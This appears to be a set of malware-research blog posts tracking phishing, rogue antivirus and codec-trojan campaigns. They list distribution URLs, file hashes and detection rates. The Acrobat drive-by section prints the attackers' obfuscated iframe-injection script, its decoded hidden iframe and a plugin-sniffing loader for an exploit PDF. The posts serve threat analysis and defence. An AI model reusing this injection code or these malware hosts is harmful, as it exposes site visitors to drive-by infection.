Today we are seeing an influx of Lloyds TSB bank phishing scam e-mails pouring in. Here is what the e-mail looks like. It contains a link to a phishing site where it will harvest the username and passwords entered into it.
Subject: Updated Terms and Conditions of Lloyds TSB Bank
Site: hxxp://www.lloydsterm.com
Harvests: User/Password/Memorable Information
A colleague called me today stating that his website was the victim of a hack and he did not know what to do. He was frantic and said that his website was distributing Antivirus 2009, so I decided to take a look at it and Lo and behold, we found Antivirus 2009 being distributed from their ad system. For those who don’t know what Antivirus 2009 is, it’s a rogue (fake) security product. You can see a video of it in action here. We traced the AV09 pop-up down to the following JavaScript counter code.
The ID has been removed to protect the victims identity
< !– Begin Motigo Webstats counter code — > < a id=”*” href=”hxxp://webstats.motigo.com/”> < img src=”hxxp://m1.webstats.motigo.com/n.gif?id=*” border=”0″ alt=”Free counter and web stats” width=”18″ height=”18″ /> < script src=”hxxp://m1.webstats.motigo.com/c.js?id=*” type=”text/javascript”> < !– End Motigo Webstats counter code — >
Resulted in this pop-up being displayed on his site:
Clicking the pop-up brought us to:
hxxp://quickupdates29.com <–don’t go here
File distributed:
File: AV2009Install_*.exe (0570484B66E9A139D8FD0A71F5448957)
MDB: /lithium-malware/AV2009Install.zip
The motigo webstat counter code is responsible for several pop-up’s and one of them is Antivirus 2009. This is a scary thought. This means that everyone hosting this code on their website can potentially infected their viewers/customers. This is an extremely cost effective distribution method for the malware creators and I bet we will see more like it as time goes by.
Important note to website owners!
If you are going to use any service (free or paid), you’d better make sure you understand all of the terms and conditions. It’s not unusual for free services to be accompanied by ad’s or pop-ups but you must ask yourself the following questions before putting anything on your site.
1. What is the service providers privacy policy?
2. What are their terms of service?
3. How do they screen their affiliate links for malware/phishing attacks?
Finally, it’s important to see what their users think of the service. As we can see, Motigo has a laundry list of pop-up complaints:
Sites: hxxp://antivirusworld9.com -> hxxp://scanthnet.com -> hxxp://innovagest2000sl.com
Files: AV2009Install_*.exe (0570484B66E9A139D8FD0A71F5448957)
VirusTotal Result: 4/36 (11.11%)
MDB: /lithium-malware/AV2009Install.zip
Here is a fresh round of malware discovered today. Most are the usual zlob variant. This post may be updated as more information about the malware is found, so check back. All files are available in /pnuemo-malware/.
Links may still be live. Proceed at your own risk.
city-codec.v.1.345.exe
Result: 18/36 (50%)
MD5: 905c85ab50f200dd0229cc93e055ed5a
VirusTotal
hxxp://city-codec.com/download/city-codec.v.1.345.exe
citycodec.v3.001.exe
Result: 5/36 (13.89%)
MD5: b71e1150138e77c14b9caa62bcd5b259
VirusTotal
hxxp://citycodec.net/download/citycodec.v3.001.exe
zcodec.1062.exe & zcodec.1091.exe
Result: 5/36 (13.89%)
MD5: b0c7c21760919e0df7606dadde5413ae
VirusTotal
hxxp://codecdownload.anothersoftportal09.com/zcodec.1062.exe
hxxp://codecdownload.anothersoftportal09.com/zcodec.1091.exe
HDCodec_ver1.5000.0.exe
Result: 2/36 (5.56%)
MD5: 5b055fc89bc0dbb2ebce8c76a7ca7c1a
VirusTotal
Sunbelt Sandbox Analysis
hxxp://pornotube8.net/load.php?
WebSoftCodecDrivern.exe
Result: 7/36 (19.45%)
MD5: d3691fac5ee729794dd013e0807514a0
VirusTotal
Sunbelt Sandbox Analysis
hxxp://viacodecright2.com/08.php
xcodec.186.exe
Result: 6/36 (16.67%)
MD5: f96300487a4472da3c0e7083534732c1
VirusTotal
Sunbelt Sandbox Analysis
hxxp://hot-porn-tube2009.net/viewmovie.php?id=186
setup.exe & setup.exe (2)
Result: 8/36 (22.23%)
MD5: 989c2f345c04eb02a7277175fdd8ee32
MD5: 632847f20721a3cf09f991fbe1acc5a6 (2)
VirusTotal
VirusTotal (2)
hxxp://www.vidsware.net/download.php?id=1653
hxxp://www.vidsware.net/download.php?id=1285 (2)
index
Result: 3/36 (8.34%)
MD5: b8db4c79a11c6a4451bf9c02bdfcfcbe
VirusTotal
hxxp://wwwforum.myphotos.cc/stat.php?f=105
We found a new WinSpywareProtect binary in the wild today. It currently has a low (2/36 hueristic) detection rate at VirusTotal. We recommend not visiting the sites unless you know what you are doing. Proceed at your own risk.
Site: hxxp://win-xp-antivir-hqscanner.com/ | hxxp://download-soft-basez.com
File: antivirus.v.1.exe (A3CB3D1DD392E1DF079F263B9C653EE8)
VirusTotal: Result: 2/36 (5.56%)
MDB: /lithium-malware/antivirus.v.1.zip
I noticed a few Advanced Antivirus URL’s started to appear this morning. I chuckle a little bit every time I see Advanced Antivirus pop up; mainly because I own AdvancedAntivirus.com (I bought it before the rogue software was created for an oddball project). Finally beat the suckers to the punch! We’ll set the laughs aside for a bit and get to the details.
File: AAVSetup.exe
MD5: 236B5229DE10D5C0ECF2743A981B646C
VirusTotal: 14/36 (38.89%)
MDB: /lithium-malware/AAVSetup.zip
Sites Distributing:
Only one file to add to the database today. Maybe later on there will be more. As usual, the URL is still live so proceed at your own risk. This is available in /pnuemo-malware/.
MediaTubeCodec_ver1.955.0.exe
Result: 3/35 (8.58%)
MD5: 1968047e55acf222d7d0a4eaee1a3c40
VirusTotal
ThreatExpert Analysis
hxxp://software-for-me08.com/download/502/955/0/
This morning we’ve found a pdf file that exploits a vulnerability in Adobe Acrobat.
When the user is directed to the infected site, there is a hidden iframe that loads the pdf file needed to exploit the machine. Here’s what happens…
Links still live, proceed at your own risk.
User visits hxxp://120.50.46.90/~admin/tps/index.php and the following obfuscated code is included
<script language=”javascript”>document.write(unescape(’%3C%69%66%72
%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%36%39%2E
%34%36%2E%32%37%2E%34%31%2F%61%66%78%76%2F%74%70%76%2F%69
%6E%64%65%78%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68
%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%22%76%69%73%69
%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74
%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%22%3E%3C%2F%69%66
%72%61%6D%65%3E’));</script>
when deobfuscated…
<iframe src=”http://69.46.27.41/afxv/tpv/index.php” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>
We can see the hidden iframe above and the page includes the following code…
<script>
ppdf=0;
i=0;
for(;navigator.plugins[i];i++)
{
re=/.d.{2}e.A.{2}o…..l..-.+?([0-9]+.[0-9]+)/;
if(res=re.exec(navigator.plugins[i].description))
{
ppdf=res[1];
}
var re=/.h.{5}v.+?s.\s([0-9])\S([0-9]).+?([0-9]{1,5})/;
var res;
if(res=re.exec(navigator.plugins[i].description))
{
flash=res[1]+’.'+res[2]+’.'+res[3];
}
}
ppdfenable=0;
if(ppdf!=0)
{
ppdfenable=0;
ppdf=ppdf.replace(/\D/g,”");
if(ppdf[0]==7 && ppdf[1]<1)ppdfenable=1;
if(ppdf[0]<7)ppdfenable=1;if(ppdfenable)
{
document.write(’<iframe width=1 height=1 src=”hxxp://69.46.27.41/afxv/tpv/gnu.pdf”></iframe>’);
}
}
</script>
Thus leading us to the pdf in question located at hxxp://69.46.27.41/afxv/tpv/gnu.pdf. Here is additional information regarding this file. This is also available in /pnuemo-malware/.
gnu.pdf
Result: 6/35 (17.15%)
MD5: 213d20a0523b6ea6c93d4348a509c34c
VirusTotal
Update your software!
UPDATED 9/1 12p PST
us.pdf
Result: 10/36 (27.78%)
MD5: 8175212481f069a6dd54de9cbd044039
VirusTotal
hxxp://174.133.121.165/us.pdf
hxxp://88.85.95.134/us.pdf
This is a special post that will provide some knowledge on how to remove some of the rogue anti-malware software that has become an epidemic (Antivirus 2008, XP Antivirus, MS Antivirus, etc.). AV companies try their best to keep up to date of all the latest incarnations of this rogue software, but in some cases it can be weeks for your AV to detect these. This will show you how you can remove some of these with free utilities. These instructions may not be that easy for the novice user, but we tried to make it as simple as possible. I will say that this process may not work in EVERY case, however most of the ones we’ve come across can be removed this way. Please be careful when attempting to remove this malware. You do not want to delete the wrong file. Try this at your own risk.
The tools used in this video are Process Explorer and Autoruns both available for free from SysInternals.
Process Explorer
Autoruns
(Click image for video)
(Click here to download video (.wmv))
Today we found a new site distributing the rogue anti-malware software, Wista Antivirus 2009. The file downloaded at the website (setup_en.exe (575953F4912EA2B9FF2598D0EE561828) currently shows zero detection over at VirusTotal. If we click on the “Free Scan” we are redirected to fake scan page and the removal file provided points to “Spyware Isolator”, which is detected by most AV’s.
Site: hxxp://wista-antivirus2009.com
File: setup_en.exe 3126445 bytes | spywareisolator_installer.exe 81920 bytes
MDB Path: /lithium-malware/setup_en.zip | /lithium-malware/
